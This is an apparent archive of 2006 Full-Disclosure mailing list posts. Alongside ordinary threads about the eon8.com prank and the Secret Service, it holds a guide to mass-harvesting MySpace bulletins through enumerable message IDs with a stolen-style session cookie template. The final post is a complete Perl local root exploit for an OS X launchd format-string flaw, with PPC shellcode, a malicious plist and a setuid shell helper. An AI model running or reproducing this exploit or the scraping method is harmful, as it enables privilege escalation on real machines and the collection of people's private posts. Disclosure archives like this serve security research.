Once all of the data has been downloaded, it's easy to parse
through using a tool like grep.

In order for this program to work, you need to download a
tool called 'netcat'. You will also need to get your cookie
once you're logged into myspace, so that you can view the
bulletins.

First of all, let's create a new file named request.txt
The contents should look something like this, but you'll need
to change the cookie to match yours.

===

Host: bulletin.myspace.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13)
Gecko/20060414
Accept: 
application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html
;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: TIMEZONE=3;
ODZDBXZG9tY#luPXXhaG#vJSRsZD1DXEWQSASLKJFLAJF;ODIJ;AEIJOIJDFOIAJEDKL124DADK
ADS;IFJO;IEAJOIFEA89U;FIO;23A;OIJDSJAOIJOIEJWAIJLDOISJFOIJ39812H12O8JAW098320AJDSLKJ32AOJ12LIJ4
A;OIJ;S;OAIJMCOISJAO8JOIRA2J38U2398JIOAJDFKANKJCNLUIHA8W734HLAIL2L3ANUHDLUIAHF87Y3LAHAKDJHF8L83
5PVVTJmRhdGluZz0wJmRyaW5rZXI9MCZlZHVjYXRpb25pZD0x;
NGUserID=a258ca5-2341-1231956342-6;
MYSPACE=myspace; AUTOSONGPLAY=0;
UNIQUELOGINTAKEOVER_10207218=%7Bts%20%272006-06-2df%047%3A32%x
A18%27%7D; MSCOUNTRY=US; FRNDIDxr2g=; rsi_want=0;
COUNTRYCODE=MFMGCisGAQQBgjdYA7GgRTBDB
gorBgEEAYI3WAMBoDUwMwIDAgABAgJmAwICAMAECHndruAVl3qwBBBgdJZ9K7N%2F34aRlhOz2UArBAi%2BqGfSVTRm7w%3
D%3D; MSCulture=IP=127.0.0.1IPCulture=en-USPreferredCulture=en-USCountry=US;
MYUSERINFO=saoijaoi;joiewjaoijdosiajdklajfoijADFJIEAJKDJFIJIEAdlkjlijelaijalidjflijaslijldsijli
AIDFJIAEwjfoiajdfeAIJDfAOJeagEOJeAJDalkjdadfAEJaijadlijfdilakmckj85423alkjdklafjdlkajdklajlkjea
aDJFAILJJae'oifja;3o4ijmaidjalkfmaijkladfjalkjfioeajlkmdmc,jkjiojoia3wjiojfoiejaoija;odijflkjda
ALOAJKEIOAJF3ea:LKfoaidjiajsioajlk3jaijdkfhfkjghncx,jlkjaweoijroiajoijadsljfdlksajfij32lja;dljf
aDJFOA:#oKkdjflkaj;ijIOJilj;ioje;ioHiuhNKJhUGJJikhiugygGTYFTJHKHIUgyuhihiugI:HUgugyfTHDGfyjgfff
2FADFaEFeaDfagFhGHggFgadcAweadddafdasfeafgeaeageaijlkfjai;hj;JIOJlihluhkHUIHKhuilgliuHLIUHLHhhh
h0DSAFOOJaewoi'jfa;ilj;oi:IOnjiehjioh;iH:IH;iohi;hg;juGYFyjfyjflukhaljdkfaejoijlajdlifjealijddd
WIaOJFoa;ejklijdaFOJEaIjo:IJEAOIJEoajf:EOJAjdailjdf;ilaj;lijioj;oije;aojojaoijoiej;oaijo;ij;oij
hNaoijao;ijdoifj;ckxx,jaiojeifajkjnaklhugi834829ijljadflkj3alijadlkjfaeljaclijeakjdoijgealijdcd
Fsaijo;ij3;oaij;oijod;iasj;oijx90asjoij3alij;ioadjf;iojeo;iaj;oij;dkjfkdjlakjdlska;

Re: [Full-disclosure] Weird... www.eon8.com

2006-06-30 Thread Aaron Gray



Looks pritty omonous, I would not log onto 
it if I were you until tommorow.

There is a counter down counting, 4 hours 35 
minutes to go. Its logging your IP address as well.

Dont know maybe nothing but it looks a bit omonous 
as I said.

If I do not post a message within 5 hours you will 
know that I have been cracked :)

Aaron

- Original Message - 
From: "Jay Buhrt" [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Friday, June 30, 2006 10:13 PM
Subject: **SPAM** [Full-disclosure] Weird... 
www.eon8.com
 Does anyone know about this site, or the projects related to it? 
 www.eon8.com ?  -- 
 Jay Buhrt Achievement Focused Technology, Inc. 
[EMAIL PROTECTED] 
574-538-8944  
___ Full-Disclosure - We 
believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: **SPAM** [Full-disclosure] Weird... www.eon8.com

2006-06-30 Thread Aaron Gray
The counter restarts with a different time each time you refresh the page, 
so not so omonous !


Aaron

- Original Message - 
From: Jay Buhrt [EMAIL PROTECTED]

To: full-disclosure@lists.grok.org.uk
Sent: Friday, June 30, 2006 10:13 PM
Subject: **SPAM** [Full-disclosure] Weird... www.eon8.com


Does anyone know about this site, or the projects related to it? 
www.eon8.com ?


--
Jay Buhrt
Achievement Focused Technology, Inc.
[EMAIL PROTECTED]
574-538-8944

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/ 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: **SPAM** [Full-disclosure] Weird... www.eon8.com

2006-06-30 Thread Cardoso
it was digged a few hours ago.

people agreed it's a viral for a game, or something. 

of course conspiracy buffs are LOVING the idea of some evil organization
USING A FRACKING WEBSITE to talk to their members...



On Sat, 1 Jul 2006 00:30:49 +0100
Aaron Gray [EMAIL PROTECTED] wrote:

AG The counter restarts with a different time each time you refresh the page, 
AG so not so omonous !
AG 
AG Aaron
AG 
AG - Original Message - 
AG From: Jay Buhrt [EMAIL PROTECTED]
AG To: full-disclosure@lists.grok.org.uk
AG Sent: Friday, June 30, 2006 10:13 PM
AG Subject: **SPAM** [Full-disclosure] Weird... www.eon8.com
AG 
AG 
AG  Does anyone know about this site, or the projects related to it? 
AG  www.eon8.com ?
AG 
AG  -- 
AG  Jay Buhrt
AG  Achievement Focused Technology, Inc.
AG  [EMAIL PROTECTED]
AG  574-538-8944
AG 
AG  ___
AG  Full-Disclosure - We believe in it.
AG  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
AG  Hosted and sponsored by Secunia - http://secunia.com/ 
AG 
AG ___
AG Full-Disclosure - We believe in it.
AG Charter: http://lists.grok.org.uk/full-disclosure-charter.html
AG Hosted and sponsored by Secunia - http://secunia.com/
AG 

year(now) + 1 será o ano do linux!
Cardoso [EMAIL PROTECTED] - SkypeIn: (11) 3711-2466 / (41) 3941-5299
vida digital: http://www.contraditorium.com site pessoal e blog: 
http://www.carloscardoso.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: **SPAM** [Full-disclosure] Weird... www.eon8.com

2006-06-30 Thread Aaron Gray

Just being careful.

Phew, I thought some evil organization was just about to hack the world with 
a new 0day :)


Aaron

- Original Message - 
From: Cardoso [EMAIL PROTECTED]

To: full-disclosure@lists.grok.org.uk
Sent: Saturday, July 01, 2006 12:40 AM
Subject: Re: **SPAM** [Full-disclosure] Weird... www.eon8.com


it was digged a few hours ago.

people agreed it's a viral for a game, or something.

of course conspiracy buffs are LOVING the idea of some evil organization
USING A FRACKING WEBSITE to talk to their members...



On Sat, 1 Jul 2006 00:30:49 +0100
Aaron Gray [EMAIL PROTECTED] wrote:

AG The counter restarts with a different time each time you refresh the 
page,

AG so not so omonous !
AG
AG Aaron
AG
AG - Original Message - 
AG From: Jay Buhrt [EMAIL PROTECTED]

AG To: full-disclosure@lists.grok.org.uk
AG Sent: Friday, June 30, 2006 10:13 PM
AG Subject: **SPAM** [Full-disclosure] Weird... www.eon8.com
AG
AG
AG  Does anyone know about this site, or the projects related to it?
AG  www.eon8.com ?
AG 
AG  -- 
AG  Jay Buhrt

AG  Achievement Focused Technology, Inc.
AG  [EMAIL PROTECTED]
AG  574-538-8944
AG 
AG  ___
AG  Full-Disclosure - We believe in it.
AG  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
AG  Hosted and sponsored by Secunia - http://secunia.com/
AG
AG ___
AG Full-Disclosure - We believe in it.
AG Charter: http://lists.grok.org.uk/full-disclosure-charter.html
AG Hosted and sponsored by Secunia - http://secunia.com/
AG

year(now) + 1 será o ano do linux!
Cardoso [EMAIL PROTECTED] - SkypeIn: (11) 3711-2466 / (41) 3941-5299
vida digital: http://www.contraditorium.com site pessoal e blog: 
http://www.carloscardoso.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/ 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] United States Secret Service

2006-06-30 Thread n3td3v

They replace a website with the USSS logo., like what happened in the
case of the shadow crew. I'm not pro Shadow crew but I find it highly
offensive that the USSS are acting in such a This is now property of
the USSS with logo, asking the remaining members of said group to
hand themselves in. I don't care if you are a government, corporation
or intelligence agency, there is no excuse for defacement, both legal
and illegal, because it sends out the wrong message. It looks like
defacement, it feels like defacement, it may not be illgal, but it
sure gives out the wrong signal to the wrong audience.

People in the know, know exatly what my comments above are about.

I'm re-issuing my original outcry over the conduct and policy of USSS
due to the recent conviction of the co-founder of shadow crew.

Thanks,

n3td3v

It will be interesting to see if folks remember what i'm talking
about, and those who do are truly on the ball.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: **SPAM** [Full-disclosure] Weird... www.eon8.com

2006-06-30 Thread Valdis . Kletnieks
On Fri, 30 Jun 2006 21:15:27 -0300, Cardoso said:
 Yes, you may be right. What better place to hide than in plain sight? 
 
 Using the old nobody would do that, we^H^H they can publish evil
 instructions the operatives, and all the fools at NSA, GRU and MI-6 will
 never take us^H^H them seriously until it's too late.

The whole Steve Jackson Games thing was a set-up to make the TLAs wary. ;)


pgpVpeZDJ6Gps.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] United States Secret Service

2006-06-30 Thread Valdis . Kletnieks
On Fri, 30 Jun 2006 23:30:08 BST, n3td3v said:
 They replace a website with the USSS logo., like what happened in the
 case of the shadow crew.

You got any proof the USSS actually did it, and isn't being joe-jobbed here?

For starters, logs showing where/how the logo was uploaded, and other
evidence linking that IP address to the USSS


pgp3hQijqwMuX.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: **SPAM** [Full-disclosure] Weird... www.eon8.com

2006-06-30 Thread Juha-Matti Laurio

Sometimes checking the cached Google version gives some basic information 
without visiting an url.
But when choosing 'Show Google's cache of www.eon8.com/'
my Firefox says Transferring data from www.eon8.com...
This is weird and not expected, because I have never visited this site.

Cached version was saved on 22nd Jun. It shows Googlebot's IP at main page:
IP: 66.249.66.207 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1;
+http://www.google.com/bot.html)

I.e. why there is traffic to eon8.com at all?

- Juha-Matti

Aaron Gray [EMAIL PROTECTED] wrote: 


Just being careful.

Phew, I thought some evil organization was just about to hack the world with 
a new 0day :)


Aaron


--clip--

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Hah, Interesting.....

2006-06-30 Thread Jay Buhrt

{eon8} Complete
As of July 1st, 2006, the E8 Project has completed.
The purpose of this project was to determine the reactions of the 
internet public to lack of information.

History
The domain eon8.com was chosen, as it is short, easily remembered, and 
eon9 was already registered.
It was originally posted on www.msfn.org, but was promptly removed as 
'spam'. It was enough time for it to be copied to other forums 
throughout December 2005.

Results
We were amazed to discover that the site was instantly linked with 
terrorism, simply for the fact that it seems mysterious. Evil was the 
number one first impression people had of the site, in spite of the fact 
that there are no threats on the site. The only thing Eon 8 says is We 
don't want you here. Nothing else.
Other less disappointing opinions were social experimentation (which was 
correct), James Bond movie viral marketing, and promotions for video games.
For many people, being faced with a countdown timer was an instant 
reason to try to shut down or hack the site. This is a worrying 
reaction, that if someone doesn't understand something they must destroy 
it. As a result, the servers have been hit quite hard these last few 
days, but luckily 99% of the 'hackers' could easily be described as 
'l4me n00bs'.
Another worrying example of paranoia was how quickly people would jump 
to conclusions, such as telephoning the registered owner of a dog seen 
in a photograph on a server that hosts a page that links to eon8.

Surprises
The folks at Unfiction.com were the most resourceful and inventive, they 
successfully managed to decrypt several of the 'codes' on the site, 
forcing them to be re-encrypted using more secure methods.

FAQ
What about eon5.com?
Nothing to do with us. Pure coincidence, but worked in our favor.

What about the 8th eon being the end of the world?
We picked Eon 8 because Eon 9 was already taken. We didn't know about 
the significance of this. Eon is a cool sounding word!


Why July 1st?
We didn't know how long it would take to get the word out using our 
subtle promotion methods. We allowed over 6 months.


What do the codes on the site mean?
They're mostly randomly generated integers encrypted with md5, but with 
certain letters removed and replaced. The Logs page is simply based on 
the current timestamp, encrypted and modified. You can't decrypt them, 
they really are random numbers.


What is the Deployment Map?
They're dots placed over major cities and several random locations, it 
was done mostly from memory. The random gif filename is an added touch 
to force a slight delay on loading, which looks more impressive in 
Internet Explorer, but not as much in Firefox.


What's the password?
There isn't one. If you did somehow manage to get in, you'd see an empty 
folder with a single text file that says This is a decoy folder. Please 
connect to the internal secure network.


Can I see your website statistics?
Yes, click here.

Are you anything to do with Scientology?
Did you see anything talking about a Free Personality Test or Xenu? Use 
your brain.


Who are you, really?
The most I can tell you is I am a 23 year old web designer from Florida 
named Mike. I can't narrow it down anymore than that. When I say 'we', I 
really mean 'me'.

Conclusions
People take things too seriously and panic over the most trivial things. 
But at the same time there are many people out there who think things 
through without jumping to conclusions. You can't let pointless 
speculation rule your lives and force you to live in fear.

In Closing
Thanks to everyone who kept things interesting, especially to the folks 
at unfiction. Sorry there is no ARG for you to play, but at least you 
had fun while it lasted.



Click here for one Final Message from Eon 8

BE HAPPY
THE END
Sincerely, x21b

Happy birthday, mtcaptain. From 'ls224' (aka x21b). Yes that really was 
me in the #eon-8 channel


--
Jay Buhrt
Achievement Focused Technology, Inc.
[EMAIL PROTECTED]
574-538-8944

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Data Mining Myspace Bulletins

2006-06-30 Thread Robert Waters

The same goes for forums; you can even read posts from private forums.
Unfortunately, you aren't able to tell which forum a post came from
just from the postID, and it is enormously difficult to guess what
postids might appear in which group, due to the high volume.
If any is interested in this (which I doubt), I've got a perl script
to slurp a range of them (which is way shorter than your C :P but
probably slower).
It can certainly be an interesting read though; people seem to have a
false sense of anonymity, judging from what they're willing to admit
on these forums.

On 6/30/06, John Hackenger [EMAIL PROTECTED] wrote:

Myspace Bulletins: The good, the bad, and the ugly

Data Mining Myspace, a case study

Author: stderr ([EMAIL PROTECTED])
http://stderr.linuxinit.net

Original release:
http://www.pandora-security.com

--

1. Abstract

We all know about myspace.com, and I'll go ahead and admit
that I actually have an account to keep up with friends.
Myspace is full of a bunch of idiots, but it can be a great
tool for keeping up with people... when used properly.

Myspace has long been a hacker playground, you may remember
the infamous Samy is my hero worm. The worm took advantage
of several poor input validation techniques which were being
employed. Each person that went to a page with his script in it,
automatically sent him a friend request. After this alarming
stunt, Myspace fixed a lot of the injection vulnerabilities.

--

2. Introduction to Bulletins

On Myspace, you can send bulletins which are sent to all
of the friends on your list. That way if you're going on
vacation or something, you can let ALL of your friends know
what's happening by sending only one message. Most people
assume that only their friends can read the bulletins they
post... they are sadly mistaken.

When you open up a bulletin, you go to a url like the following.

http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.readmessageID=1

Yes, you guessed it. If you change the messageID number,
you can view any bulletin on Myspace that hasn't yet
expired. Now, if we could just collect a ton of bulletins,
then we could surely find some juicy information like
cell phone numbers, when people are leaving for vacation,
where they're going... the list goes on and on.

The implementation of bulletins so that everyone can view them
may be intentional, but most people assume that bulletins are
only readable by friends. Because of this belief, many people
post personal details in bulletins, never expecting people
like you to read them. The mere existence of the Delete from
friends button implies that only friends should be able to
read your bulletins.

--

3. Mining the data

I was able to whip together a small C program that generates
urls, retrieves the bulletin, and saves the html to a file.
Once all of the data has been downloaded, it's easy to parse
through using a tool like grep.

In order for this program to work, you need to download a
tool called 'netcat'. You will also need to get your cookie
once you're logged into myspace, so that you can view the
bulletins.

First of all, let's create a new file named request.txt
The contents should look something like this, but you'll need
to change the cookie to match yours.

===

Host: bulletin.myspace.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13)
Gecko/20060414
Accept: 
application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html
;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: TIMEZONE=3;
ODZDBXZG9tY#luPXXhaG#vJSRsZD1DXEWQSASLKJFLAJF;ODIJ;AEIJOIJDFOIAJEDKL124DADK
ADS;IFJO;IEAJOIFEA89U;FIO;23A;OIJDSJAOIJOIEJWAIJLDOISJFOIJ39812H12O8JAW098320AJDSLKJ32AOJ12LIJ4
A;OIJ;S;OAIJMCOISJAO8JOIRA2J38U2398JIOAJDFKANKJCNLUIHA8W734HLAIL2L3ANUHDLUIAHF87Y3LAHAKDJHF8L83
5PVVTJmRhdGluZz0wJmRyaW5rZXI9MCZlZHVjYXRpb25pZD0x;
NGUserID=a258ca5-2341-1231956342-6;
MYSPACE=myspace; AUTOSONGPLAY=0;
UNIQUELOGINTAKEOVER_10207218=%7Bts%20%272006-06-2df%047%3A32%x
A18%27%7D; MSCOUNTRY=US; FRNDIDxr2g=; rsi_want=0;
COUNTRYCODE=MFMGCisGAQQBgjdYA7GgRTBDB
gorBgEEAYI3WAMBoDUwMwIDAgABAgJmAwICAMAECHndruAVl3qwBBBgdJZ9K7N%2F34aRlhOz2UArBAi%2BqGfSVTRm7w%3
D%3D; MSCulture=IP=127.0.0.1IPCulture=en-USPreferredCulture=en-USCountry=US;
MYUSERINFO=saoijaoi;joiewjaoijdosiajdklajfoijADFJIEAJKDJFIJIEAdlkjlijelaijalidjflijaslijldsijli
AIDFJIAEwjfoiajdfeAIJDfAOJeagEOJeAJDalkjdadfAEJaijadlijfdilakmckj85423alkjdklafjdlkajdklajlkjea
aDJFAILJJae'oifja;3o4ijmaidjalkfmaijkladfjalkjfioeajlkmdmc,jkjiojoia3wjiojfoiejaoija;odijflkjda

Re: [Full-disclosure] DMA[2006-0628a] - 'Apple OSX launchd unformatted syslog() vulnerability'

2006-06-30 Thread K F (lists)

Just so no one feels left out...


-KF
#!/usr/bin/perl
#
# http://www.digitalmunition.com/FailureToLaunch-ppc.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# Much appreciation goes to John H for all kindsa random shit like exploiting 
Veritas and other random things in the past
#
# core... where the hell are you fool. 
#
# This is just a vanilla format string exploit for OSX on ppc. We overwrite a 
saved return addy with our shellcode address.
# This code currently overwrites a saved return addy with the stack location of 
our seteuid() / execve() shellcode.
#
# This exploit will create a malicious .plist file for you to use with launchctl
# kevin-finisterres-mac-mini:~ kfinisterre$ launchctl load ./com.pwnage.plist
#
# In theory I guess you could also drop this in ~/Library/LaunchAgents
# 
# This was tested against OSX 10.4.6 8l127 on a 1.25GHz PowerPC G4 and a
# 500mhz PowerPC G3 running 10.4 8A428
# 
# kevin-finisterres-mac-mini:~ kfinisterre$ ls -al /sbin/launchd
# -rwsr-sr-x   1 root  wheel  80328 Feb 19 04:09 /sbin/launchd
# kevin-finisterres-mac-mini:~ kfinisterre$ file /sbin/launchd
# /sbin/launchd: setuid setgid Mach-O executable ppc
#
# ./src/SystemStarter.c:374:  syslog(level, buf);
#
# 
http://developer.apple.com/documentation/Security/Conceptual/SecureCodingGuide/Articles/AccessControl.html
# Because launchd is a critical system component, it receives a lot of peer 
review by in-house developers at Apple. 
#  It is less likely to contain security vulnerabilities than most production 
code.
# 

foreach $key (keys %ENV) {

delete $ENV{$key};

}

#// ppc execve() code by b-r00t + nemo to add seteuid(0)
$sc = 
\x7c\x63\x1a\x79 . 
\x40\x82\xff\xfd . 
\x39\x40\x01\xc3 . 
\x38\x0a\xfe\xf4 . 
\x44\xff\xff\x02 . 
\x39\x40\x01\x23 . 
\x38\x0a\xfe\xf4 . 
\x44\xff\xff\x02 .
\x60\x60\x60\x60 . 
\x7c\xa5\x2a\x79\x40\x82\xff\xfd . 
\x7d\x68\x02\xa6\x3b\xeb\x01\x70 .
\x39\x40\x01\x70\x39\x1f\xfe\xcf .
\x7c\xa8\x29\xae\x38\x7f\xfe\xc8 .
\x90\x61\xff\xf8\x90\xa1\xff\xfc .
\x38\x81\xff\xf8\x38\x0a\xfe\xcb .
\x44\xff\xff\x02\x7c\xa3\x2b\x78 .
\x38\x0a\xfe\x91\x44\xff\xff\x02 .
\x2f\x74\x6d\x70\x2f\x73\x68\x58;

$writeaddr = 0xbcf8; # Saved Return addy from frame 3 
$ENV{TERM_PROGRAM} = - . pack('l', $writeaddr) . pack('l', $writeaddr+2) . 
 x 1 . $sc ;

$format =   
# make it more robust yourself... I'm lazy
# 0xbfff fe70
% . 0xbfff . d%112\$hn .
% . 0x3ed9 . d%113\$hn ;

open(SUSH,/tmp/aaa.c);
printf SUSH int main(){seteuid(0);setuid(0);setgid(0);system(\/bin/sh\);}\n;
system(PATH=$PATH:/usr/bin/ cc -o /tmp/sh /tmp/aaa.c);

open(PWNED,com.pwnage.plist);   

print PWNED ?xml version=\1.0\ encoding=\UTF-8\?
!DOCTYPE plist PUBLIC \-//Apple Computer//DTD PLIST 1.0//EN\ 
\http://www.apple.com/DTDs/PropertyList-1.0.dtd\;
plist version=\1.0\
dict
keyLabel/key
string . $format .
/string
keyProgramArguments/key
array
stringhttp://www.digitalmunition.com/string
/array
keyRunAtLoad/key
true/
/dict
/plist\n;
close(PWNED);
print open a new window and type - \launchctl load ./com.pwnage.plist\\n;
system(/sbin/launchd);


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/